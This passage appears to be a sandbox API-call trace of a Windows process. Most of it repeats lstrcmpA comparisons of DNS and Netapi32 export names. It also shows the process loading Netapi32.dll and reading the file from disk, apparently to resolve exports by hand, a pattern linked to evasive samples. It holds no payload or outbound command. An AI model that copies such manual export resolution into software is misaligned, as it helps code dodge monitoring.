lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.398] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AddRefQueryBlobEx") returned 1 [0252.398] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="BreakRecordsIntoBlob") returned 1 [0252.398] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.398] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="CombineRecordsInBlob") returned 1 [0252.398] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DeRefQueryBlobEx") returned 1 [0252.398] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DelaySortDAServerlist") returned 1 [0252.398] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_A") returned 1 [0252.398] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_W") returned 1 [0252.398] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAllocateRecord") returned 0 [0252.398] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.398] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.398] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AddRefQueryBlobEx") returned 1 [0252.398] lstrcmpA (lpString1="DnsApiAlloc", lpString2="BreakRecordsIntoBlob") returned 1 [0252.398] lstrcmpA (lpString1="DnsApiAlloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.398] lstrcmpA (lpString1="DnsApiAlloc", lpString2="CombineRecordsInBlob") returned 1 [0252.399] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DeRefQueryBlobEx") returned 1 [0252.399] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DelaySortDAServerlist") returned 1 [0252.399] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0252.399] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0252.399] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAllocateRecord") returned 1 [0252.399] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsApiAlloc") returned 0 [0252.399] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.399] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.399] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AddRefQueryBlobEx") returned 1 [0252.399] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="BreakRecordsIntoBlob") returned 1 [0252.399] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.399] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="CombineRecordsInBlob") returned 1 [0252.399] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DeRefQueryBlobEx") returned 1 [0252.399] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DelaySortDAServerlist") returned 1 [0252.399] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_A") returned 1 [0252.399] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_W") returned 1 [0252.399] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAllocateRecord") returned 1 [0252.399] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAlloc") returned 1 [0252.399] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAllocZero") returned 0 [0252.399] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.400] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.400] lstrcmpA (lpString1="DnsApiFree", lpString2="AddRefQueryBlobEx") returned 1 [0252.400] lstrcmpA (lpString1="DnsApiFree", lpString2="BreakRecordsIntoBlob") returned 1 [0252.400] lstrcmpA (lpString1="DnsApiFree", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.400] lstrcmpA (lpString1="DnsApiFree", lpString2="CombineRecordsInBlob") returned 1 [0252.400] lstrcmpA (lpString1="DnsApiFree", lpString2="DeRefQueryBlobEx") returned 1 [0252.400] lstrcmpA (lpString1="DnsApiFree", lpString2="DelaySortDAServerlist") returned 1 [0252.400] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_A") returned 1 [0252.400] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_W") returned 1 [0252.400] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAllocateRecord") returned 1 [0252.400] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAlloc") returned 1 [0252.400] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAllocZero") returned 1 [0252.400] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiFree") returned 0 [0252.400] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.400] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.401] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AddRefQueryBlobEx") returned 1 [0252.401] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="BreakRecordsIntoBlob") returned 1 [0252.401] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.401] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="CombineRecordsInBlob") returned 1 [0252.401] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DeRefQueryBlobEx") returned 1 [0252.401] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DelaySortDAServerlist") returned 1 [0252.401] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_A") returned 1 [0252.401] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_W") returned 1 [0252.401] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAllocateRecord") returned 1 [0252.401] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAlloc") returned 1 [0252.401] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAllocZero") returned 1 [0252.401] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiFree") returned 1 [0252.401] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiHeapReset") returned 0 [0252.401] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.401] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.401] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AddRefQueryBlobEx") returned 1 [0252.401] lstrcmpA (lpString1="DnsApiRealloc", lpString2="BreakRecordsIntoBlob") returned 1 [0252.401] lstrcmpA (lpString1="DnsApiRealloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.401] lstrcmpA (lpString1="DnsApiRealloc", lpString2="CombineRecordsInBlob") returned 1 [0252.401] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DeRefQueryBlobEx") returned 1 [0252.401] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DelaySortDAServerlist") returned 1 [0252.401] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0252.401] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0252.402] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAllocateRecord") returned 1 [0252.402] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAlloc") returned 1 [0252.402] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAllocZero") returned 1 [0252.402] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiFree") returned 1 [0252.402] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiHeapReset") returned 1 [0252.402] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiRealloc") returned 0 [0252.402] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.402] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.402] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AddRefQueryBlobEx") returned 1 [0252.402] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="BreakRecordsIntoBlob") returned 1 [0252.402] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.402] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="CombineRecordsInBlob") returned 1 [0252.402] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DeRefQueryBlobEx") returned 1 [0252.402] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DelaySortDAServerlist") returned 1 [0252.402] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_A") returned 1 [0252.402] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_W") returned 1 [0252.402] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAllocateRecord") returned 1 [0252.402] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAlloc") returned 1 [0252.402] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAllocZero") returned 1 [0252.402] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiFree") returned 1 [0252.402] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiHeapReset") returned 1 [0252.402] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiRealloc") returned 1 [0252.402] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiSetDebugGlobals") returned 0 [0252.402] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.402] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.402] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AddRefQueryBlobEx") returned 1 [0252.402] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="BreakRecordsIntoBlob") returned 1 [0252.402] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.403] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="CombineRecordsInBlob") returned 1 [0252.403] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DeRefQueryBlobEx") returned 1 [0252.403] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DelaySortDAServerlist") returned 1 [0252.403] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_A") returned 1 [0252.403] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAcquireContextHandle_W") returned 1 [0252.403] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAllocateRecord") returned 1 [0252.403] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAlloc") returned 1 [0252.403] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiAllocZero") returned 1 [0252.403] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiFree") returned 1 [0252.403] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiHeapReset") returned 1 [0252.403] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiRealloc") returned 1 [0252.403] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsApiSetDebugGlobals") returned 1 [0252.403] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="DnsAsyncRegisterHostAddrs") returned 0 [0252.403] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.403] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.403] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="AddRefQueryBlobEx") returned 1 [0252.403] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="BreakRecordsIntoBlob") returned 1 [0252.403] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.403] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="CombineRecordsInBlob") returned 1 [0252.403] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DeRefQueryBlobEx") returned 1 [0252.403] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DelaySortDAServerlist") returned 1 [0252.403] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_A") returned 1 [0252.403] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAcquireContextHandle_W") returned 1 [0252.404] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAllocateRecord") returned 1 [0252.404] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAlloc") returned 1 [0252.404] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiAllocZero") returned 1 [0252.404] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiFree") returned 1 [0252.404] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiHeapReset") returned 1 [0252.404] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiRealloc") returned 1 [0252.404] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsApiSetDebugGlobals") returned 1 [0252.404] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0252.404] lstrcmpA (lpString1="DnsAsyncRegisterInit", lpString2="DnsAsyncRegisterInit") returned 0 [0252.404] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.404] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.404] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="AddRefQueryBlobEx") returned 1 [0252.404] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="BreakRecordsIntoBlob") returned 1 [0252.404] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.404] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="CombineRecordsInBlob") returned 1 [0252.404] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DeRefQueryBlobEx") returned 1 [0252.404] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DelaySortDAServerlist") returned 1 [0252.404] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_A") returned 1 [0252.404] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAcquireContextHandle_W") returned 1 [0252.404] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAllocateRecord") returned 1 [0252.404] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAlloc") returned 1 [0252.404] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiAllocZero") returned 1 [0252.404] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiFree") returned 1 [0252.404] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiHeapReset") returned 1 [0252.404] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiRealloc") returned 1 [0252.404] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsApiSetDebugGlobals") returned 1 [0252.404] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0252.405] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterInit") returned 1 [0252.405] lstrcmpA (lpString1="DnsAsyncRegisterTerm", lpString2="DnsAsyncRegisterTerm") returned 0 [0252.405] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.406] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.406] lstrcmpA (lpString1="DnsCancelQuery", lpString2="AddRefQueryBlobEx") returned 1 [0252.406] lstrcmpA (lpString1="DnsCancelQuery", lpString2="BreakRecordsIntoBlob") returned 1 [0252.406] lstrcmpA (lpString1="DnsCancelQuery", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.406] lstrcmpA (lpString1="DnsCancelQuery", lpString2="CombineRecordsInBlob") returned 1 [0252.406] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DeRefQueryBlobEx") returned 1 [0252.406] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DelaySortDAServerlist") returned 1 [0252.406] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_A") returned 1 [0252.406] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAcquireContextHandle_W") returned 1 [0252.406] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAllocateRecord") returned 1 [0252.406] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAlloc") returned 1 [0252.406] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiAllocZero") returned 1 [0252.406] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiFree") returned 1 [0252.406] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiHeapReset") returned 1 [0252.406] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiRealloc") returned 1 [0252.406] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsApiSetDebugGlobals") returned 1 [0252.406] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0252.406] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterInit") returned 1 [0252.406] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsAsyncRegisterTerm") returned 1 [0252.406] lstrcmpA (lpString1="DnsCancelQuery", lpString2="DnsCancelQuery") returned 0 [0252.406] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.406] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.406] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="AddRefQueryBlobEx") returned 1 [0252.407] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="BreakRecordsIntoBlob") returned 1 [0252.407] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.407] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="CombineRecordsInBlob") returned 1 [0252.407] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DeRefQueryBlobEx") returned 1 [0252.407] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DelaySortDAServerlist") returned 1 [0252.407] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_A") returned 1 [0252.407] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAcquireContextHandle_W") returned 1 [0252.407] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAllocateRecord") returned 1 [0252.407] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAlloc") returned 1 [0252.407] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiAllocZero") returned 1 [0252.407] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiFree") returned 1 [0252.407] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiHeapReset") returned 1 [0252.407] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiRealloc") returned 1 [0252.407] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsApiSetDebugGlobals") returned 1 [0252.407] lstrcmpA (lpString1="DnsCopyStringEx", lpString2="DnsAsyncRegisterHostAddrs") returned 1 [0252.419] GetProcessHeap () returned 0x4e0000 [0252.419] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x3a5d010 | out: hHeap=0x4e0000) returned 1 [0252.419] GetProcessHeap () returned 0x4e0000 [0252.419] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x10) returned 0x4f9380 [0252.419] LoadLibraryA (lpLibFileName="Netapi32.dll") returned 0x7ffc5cb30000 [0252.422] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0252.422] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0252.423] GetModuleFileNameA (in: hModule=0x7ffc5cb30000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")) returned 0x20 [0252.423] CreateFileA (lpFileName="C:\\Windows\\system32\\Netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0252.423] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0252.423] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0252.424] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=80640) returned 1 [0252.424] GetProcessHeap () returned 0x4e0000 [0252.424] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x13b00) returned 0x2d25030 [0252.424] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0252.424] ReadFile (in: hFile=0x17c, lpBuffer=0x2d25030, nNumberOfBytesToRead=0x13b00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d25030*, lpNumberOfBytesRead=0x14f5a4*=0x13b00, lpOverlapped=0x0) returned 1 [0252.424] CloseHandle (hObject=0x17c) returned 1 [0252.424] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavAddConnection") returned 1 [0252.424] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavDeleteConnection") returned 1 [0252.424] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavFlushFile") returned 1 [0252.424] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetExtendedError") returned 1 [0252.424] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetHTTPFromUNCPath") returned 1 [0252.424] lstrcmpA (lpString1="NetAccessAdd", lpString2="DavGetUNCFromHTTPPath") returned 1 [0252.424] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesA") returned 1 [0252.424] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExA") returned 1 [0252.424] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesExW") returned 1 [0252.424] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsAddressToSiteNamesW") returned 1 [0252.424] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsA") returned 1 [0252.424] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsDeregisterDnsHostRecordsW") returned 1 [0252.424] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsA") returned 1 [0252.425] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsEnumerateDomainTrustsW") returned 1 [0252.425] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcCloseW") returned 1 [0252.425] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameA") returned 1 [0252.425] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameW") returned 1 [0252.425] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountA") returned 1 [0252.425] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNameWithAccountW") returned 1 [0252.425] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextA") returned 1 [0252.425] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcNextW") returned 1 [0252.425] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenA") returned 1 [0252.425] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcOpenW") returned 1 [0252.425] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageA") returned 1 [0252.425] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetDcSiteCoverageW") returned 1 [0252.425] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetForestTrustInformationW") returned 1 [0252.425] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameA") returned 1 [0252.425] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsGetSiteNameW") returned 1 [0252.425] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsMergeForestTrustInformationW") returned 1 [0252.425] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleFreeMemory") returned 1 [0252.425] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0252.425] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameA") returned 1 [0252.425] lstrcmpA (lpString1="NetAccessAdd", lpString2="DsValidateSubnetNameW") returned 1 [0252.425] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugCall") returned 1 [0252.425] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserDebugTrace") returned 1 [0252.425] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0252.425] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryOtherDomains") returned 1 [0252.425] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserQueryStatistics") returned 1 [0252.425] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetNetlogonState") returned 1 [0252.425] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserResetStatistics") returned 1 [0252.425] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserServerEnum") returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_BrowserSetNetlogonState") returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountDeltas") returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetAccountSync") returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes") returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetChainSetClientAttributes2") returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseDeltas") returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseRedo") returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync") returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDatabaseSync2") returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsGetVersion") returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetDfsIsThisADomainName") returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetDCList") returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetGetForestTrustInformation") returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl") returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonControl2") returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonGetDomainInfo") returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogoff") returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogon") returned 1 [0252.426] lstrcmpA (lpString1="NetAccessAdd", lpString2="I_NetLogonSamLogonEx") 